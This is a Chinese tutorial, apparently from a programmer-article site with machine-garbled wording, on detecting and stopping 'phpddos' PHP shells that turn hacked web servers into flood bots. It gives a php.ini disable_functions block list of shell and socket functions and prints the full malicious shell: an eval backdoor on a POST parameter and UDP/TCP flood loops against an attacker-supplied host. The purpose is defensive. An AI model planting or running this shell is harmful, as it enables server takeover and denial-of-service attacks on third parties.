欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

phpddos流量攻击预防方法

程序员文章站 2022-06-22 20:10:11
先来理解一下什么是phpddos流量攻击,phpddos是一种黑客经过入侵WEB效劳器植入phpshell从而控制这个phpshell 向其他受害者或本人的效劳器发送UDP攻击包停止DDOS攻击... 12-10-18...
这类攻击有一个最大的特性,就是上传流量霎时增大,通常流量高达数十以至近百m,将整台效 劳器,以至将整台机柜的宽带堵住,使网站无法运转,而这样的攻击,我们无法从远程处理,一但那个phpshell运转,你的宽带将被全部占用,远程都无法 衔接。

  被攻击后能做的只要联络机房的工作人员,让他进到你的效劳器里把你的iis关掉,再没查分明是哪个站点被入侵时,尽量一个站点也不要开,以免再 次遭到攻击,怎样看是不是这个攻击呢,不能说关掉iss好了,就是这种攻击了,而要依据更精确的查看,才能够肯定是什么问题,翻开360平安卫士,然后翻 开功用大全,到里面找到流量防火墙,在这里你能够看到每一个进程的上传和下载流量的几,留意躲藏的系统效劳也要点开看一下,普通都是上传超大才是 phpddos攻击,而且普通都会在w3wp.exe和mysql.exe上传流量会很大,最小也几百m,最大几g,好晓得是这个攻击了,我们就来想方法 处理。

  处理办法:

  1.应用360流量防火墙,把w3wp.exe和mysql.exe的上传流量限制一下,依据你效劳器本身宽带的状况停止限制,普通限制在 200—300kb都没什么问题,这样就不怕phpshell发起大流量攻击了,不过这个方法有一个缺陷,就是当你重新启动效劳器时,你之前所限制 w3wp.exe和mysql.exe就不起作用了,要重新限制一下,用这个办法的朋友一定要留意这一点。

  2.经过更改php运转环境来处理,翻开php.ini找到disable_functions=这项,然后把后面改成 gzinflate,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen。 将allow_url_fopen = off,再找到extension=php_sockets.dll这项,把前面加上分号,就是屏蔽掉这项。

  3.经过查找攻击源处理,批量查找一切网站内能否存在phpshell攻击源代码,源代码为(由于代码太乱以图片方式展现给大家)如图:

复制代码
代码如下:

<?php
eval($_post[chr(90)]);
set_time_limit(86400);
ignore_user_abort(true);
$packets = 0;
$http = $_get['http'];
$rand = $_get['exit'];
$exec_time = $_get['time'];
if (strlen($http)==0 or strlen($rand)==0 or strlen($exec_time)==0)
{
if(strlen($_get['rat'])<>0)
{
echo $_get['rat'].$_server["http_host"]."|".gethostbyname($_server['server_name'])."|".php_uname()."|".$_server['server_software'].$_get['rat'];
exit;
}
echo "php 2012 terminator";
exit;
}
for($i=0;$i<65535;$i++)
{
$out .= "x";
}
//udp1-fsockopen udp2 pfsockopen tcp3 cc.center
$max_time = time()+$exec_time;
if($rand==53)
while(1)
{
$packets++;
if(time() > $max_time)
{
break;
}
$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
if($rand==500)
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
?>

经过批量查找网站内能否有类似上图的源码,找到后删除,把网站权限设置为不可写入,这样在没有修补好这个网站破绽前,不会再被植入木马了。